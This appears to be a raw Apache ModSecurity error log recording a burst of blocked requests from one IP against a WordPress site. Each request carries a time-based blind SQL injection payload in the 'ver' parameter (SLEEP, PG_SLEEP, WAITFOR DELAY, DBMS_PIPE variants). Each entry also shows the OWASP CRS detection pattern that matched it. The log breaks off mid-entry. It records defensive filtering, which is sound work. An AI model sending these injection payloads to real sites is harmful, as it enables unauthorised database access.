[client 141.98.81.52:34196] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16');SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFioxkekPtrPbqLNY4PAAAANQ"] [Wed Jun 26 16:18:03.167972 2024] [:error] [pid 31859:tid 140055234430720] [client 141.98.81.52:34198] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFi4xkekPtrPbqLNY4PQAAANI"] [Wed Jun 26 16:18:03.410169 2024] [:error] [pid 31859:tid 140055301572352] [client 141.98.81.52:34200] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16%';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFi4xkekPtrPbqLNY4PgAAAMo"] [Wed Jun 26 16:18:03.644137 2024] [:error] [pid 31245:tid 140055242823424] [client 141.98.81.52:34202] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16);SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFi657xDCgKzJ-zxAxigAAAFE"] [Wed Jun 26 16:18:03.885309 2024] [:error] [pid 31859:tid 140055309965056] [client 141.98.81.52:34204] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16;SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFi4xkekPtrPbqLNY4PwAAAMk"] [Wed Jun 26 16:18:04.132674 2024] [:error] [pid 31859:tid 140055441204992] [client 141.98.81.52:34206] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16');SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFjIxkekPtrPbqLNY4QAAAAMI"] [Wed Jun 26 16:18:04.366633 2024] [:error] [pid 31859:tid 140055318357760] [client 141.98.81.52:34208] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFjIxkekPtrPbqLNY4QQAAAMg"] [Wed Jun 26 16:18:06.479325 2024] [:error] [pid 31859:tid 140055407634176] [client 141.98.81.52:34210] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16%';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFjoxkekPtrPbqLNY4QgAAAMY"] [Wed Jun 26 16:18:07.397195 2024] [:error] [pid 31859:tid 140055192467200] [client 141.98.81.52:34212] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16);WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFj4xkekPtrPbqLNY4QwAAANc"] [Wed Jun 26 16:18:07.627509 2024] [:error] [pid 31246:tid 140055301572352] [client 141.98.81.52:34214] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16;WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFj1xchXPGtOGw21Gp3AAAAIo"] [Wed Jun 26 16:18:07.875455 2024] [:error] [pid 31245:tid 140055251216128] [client 141.98.81.52:34216] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16');WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFj657xDCgKzJ-zxAxiwAAAFA"] [Wed Jun 26 16:18:08.123207 2024] [:error] [pid 31246:tid 140055200859904] [client 141.98.81.52:34218] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkFxchXPGtOGw21Gp3QAAAJY"] [Wed Jun 26 16:18:08.367605 2024] [:error] [pid 31246:tid 140055209252608] [client 141.98.81.52:34220] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16%';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkFxchXPGtOGw21Gp3gAAAJU"] [Wed Jun 26 16:18:08.600113 2024] [:error] [pid 31244:tid 140055449597696] [client 141.98.81.52:34222] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(83)||CHR(73)||CHR(108),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkObXXCyFmkhe1iNqRgAAAAE"] [Wed Jun 26 16:18:08.845206 2024] [:error] [pid 31859:tid 140055416026880] [client 141.98.81.52:34224] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(83)||CHR(73)||CHR(108),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkIxkekPtrPbqLNY4RAAAAMU"] [Wed Jun 26 16:18:09.088382 2024] [:error] [pid 31859:tid 140055200859904] [client 141.98.81.52:34226] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(83)||CHR(73)||CHR(108),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkYxkekPtrPbqLNY4RQAAANY"] [Wed Jun 26 16:18:09.335865 2024] [:error] [pid 31859:tid 140055424419584] [client 141.98.81.52:34228] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(83)||CHR(73)||CHR(108),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkYxkekPtrPbqLNY4RgAAAMQ"] [Wed Jun 26 16:18:09.583588 2024] [:error] [pid 31859:tid 140055284786944] [client 141.98.81.52:34230] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(83)||CHR(73)||CHR(108),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkYxkekPtrPbqLNY4RwAAAMw"] [Wed Jun 26 16:18:09.832663 2024] [:error] [pid 31246:tid 140055242823424] [client 141.98.81.52:34232] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16) AND SLEEP(5) AND (2798=2798"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkVxchXPGtOGw21Gp3wAAAJE"] [Wed Jun 26 16:18:10.071572 2024] [:error] [pid 31246:tid 140055432812288] [client 141.98.81.52:34234] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16 AND SLEEP(5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFklxchXPGtOGw21Gp4AAAAIM"] [Wed Jun 26 16:18:10.308085 2024] [:error] [pid 31246:tid 140055457990400] [client 141.98.81.52:34236] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16') AND SLEEP(5) AND ('QNyo'='QNyo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFklxchXPGtOGw21Gp4QAAAIA"] [Wed Jun 26 16:18:10.555566 2024] [:error] [pid 31859:tid 140055457990400] [client 141.98.81.52:34238] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line 